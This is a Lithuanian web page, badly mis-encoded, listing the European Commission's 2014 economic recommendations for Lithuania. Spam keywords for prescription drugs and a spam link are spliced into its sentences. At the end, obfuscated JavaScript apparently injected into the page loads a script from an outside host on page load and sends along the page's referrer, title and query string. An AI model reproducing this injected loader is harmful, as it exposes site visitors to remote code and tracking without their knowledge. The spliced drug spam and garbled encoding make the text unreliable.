KA� Europos Komisija rekomenduoja Lietuvai?

A�iandien Europos Komisija pateikA� rekomendacijas dA�l biudA?eto, uA?imtumo ir kitA? struktA�riniA? isotretinoin sell reformA?, kurias kiekviena ES valstybA� narA� turA�tA? A?gyvendinti per ateinanA?ius 12a��18 mA�n., kad sustiprintA? ekonomikos augimA�

Kasmet http://aeusasoftball.com/8v-brandlevitraovernight/ kiekvienai ES valstybei narei pateikiamos rekomendacijos yra dalis Europos semestro a�� ES ekonomikos politikos koordinavimo kalendoriaus, kuris skirtas problemoms nustatyti ir iA?sprA�sti ir taip uA?kirsti keliA� galimoms krizA�ms. Rekomendacijomis valstybA�s narA�s taip pat skatinamos siekti ilgalaikiA? uA?imtumo, A?vietimo, moksliniA? tyrimA?, klimato kaitos ir skurdo maA?inimo tikslA? pagal strategijA� a�zEuropa 2020a�?. KonkreA?ioms A?alims skirtas rekomendacijas Europos VadovA? Taryba tvirtins birA?elio 26a��27 d. VA�liau, liepos mA�n., jas priims ES finansA? ministrai.

Lietuvai skirtos rekomendacijos:

1. Sustiprinti 2014 m. biudA?eto priemones, atsiA?velgiant A? iA?laidA? kriterijA? virA?ijantA? iA?laidA? didA�jimA� ir A? atsirandantA? 0,3 % BVP atotrA�kA? nuo Komisijos 2014 m.pavasario prognozA�je reikalaujamA? cuantas pastillas cytotec para abortar struktA�riniA? pastangA?; A?is atotrA�kis rodo, kad yra didelio nukrypimo nuo Stabilumo ir augimo pakto reikalavimA? rizika. 2015 m. sustiprinti biudA?eto strategijA�, kad bA�tA? uA?tikrintas reikalaujamas 0,5 % BVP koregavimas siekiant vidutinio laikotarpio tikslo. Paskesniais metais uA?tikrinti, kad bA�tA? laikomasi vidutinio laikotarpio buy viagra in dubai tikslo. BiudA?eto strategijA� papildyti sustiprinta fiskaline sistema, pagal kuriA� nustatant vidutinio laikotarpio biudA?eto sistemA� visA? pirma bA�tA? uA?tikrintos privalomos virA?utinA�s iA?laidA? ribos. TA�sti mokesA?iA? sistemos perA?iA�rA� ir apsvarstyti galimybA� padidinti tuos mokesA?ius, kurie maA?iausiai kenkia ekonomikos augimui, kaip antai periodinius nekilnojamojo turto ir aplinkosaugos mokesA?ius, kartu toliau gerinant mokestiniA? prievoliA? vykdymA�.

2. Priimti ir A?gyvendinti teisA�s aktus dA�l visapusiA?kos pensijA? sistemos reformos. VisA? pirma suderinti teisA�s aktais nustatytA� pensinA? amA?iA? su vidutine tikA�tina gyvenimo trukme, apriboti galimybes anksA?iau iA?eiti A? pensijA�, nustatyti aiA?kias pensijA? indeksavimo taisykles ir skatinti naudoti papildomo kaupimo schemas. PensijA? reformA� pagrA?sti priemonA�mis, kuriomis didinamos vyresnio amA?iaus A?moniA? galimybA�s A?sidarbinti.

3. Tikslingiau taikyti aktyvios darbo rinkos politikos priemones A?emos kvalifikacijos ir ilgalaikiams bedarbiams. Padidinti bedarbio paA?alpA? aprA�ptA? ir pakankamumA� ir jas susieti su aktyvumo skatinimo priemonA�mis. SprA�sti nuolatinA�s gebA�jimA? paklausos ir pasiA�los neatitikties problemA� padidinant A?vietimo sistemos suteikiamA? A?gA�dA?iA? atitiktA? darbo rinkos poreikiams ir skatinti mokymA�si visA� gyvenimA�. Siekiant padidinti jaunimo galimybes A?sidarbinti skatinti kokybiA?kas pameistrystA�s programas ir stiprinti partnerystA� su privaA?iuoju sektoriumi. Konsultuojantis su socialiniais partneriais perA?iA�rA�ti darbo teisA�s aktA?, visA? pirma susijusiA? su darbo sutarA?iA? sA�lygomis ir darbo laiko tvarka, tinkamumA�.

4. UA?tikrinti, kad reikiama parama bA�tA? teikiama asmenims, kuriems jos labiausiai reikia, ir toliau stiprinti piniginA�s socialinA�s paramos sistemos ortho tri-cyclen. sA�sajas su aktyvumo skatinimo priemonA�mis.

5. UA?baigti, kaip planuota, valstybA�s valdomA? A?moniA? reformA�; visA? pirma uA?tikrinti, kad bA�tA? atskirta komercinA� ir nekomercinA� veikla, toliau bA�tA? didinamas vykdomA?jA? valdybA? nariA? profesionalumas ir A?dA�miai stebA�ti, kad bA�tA? laikomasi reformos reikalavimA?.

6. Suaktyvinti veiksmus, kad bA�tA? padidintas pastatA? energinis efektyvumas sparA?iai A?sisavinant kontroliuojanA?iojo fondo lA�A?as. Toliau plA�sti elektros energijos ir dujA? tinklA? tarpvalstybines jungtis su kaimyninA�mis valstybA�mis narA�mis, kad gerinant Baltijos A?aliA? energijos rinkA? integracijA� bA�tA? diversifikuojami energijos A?altiniai ir skatinama konkurencija.

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}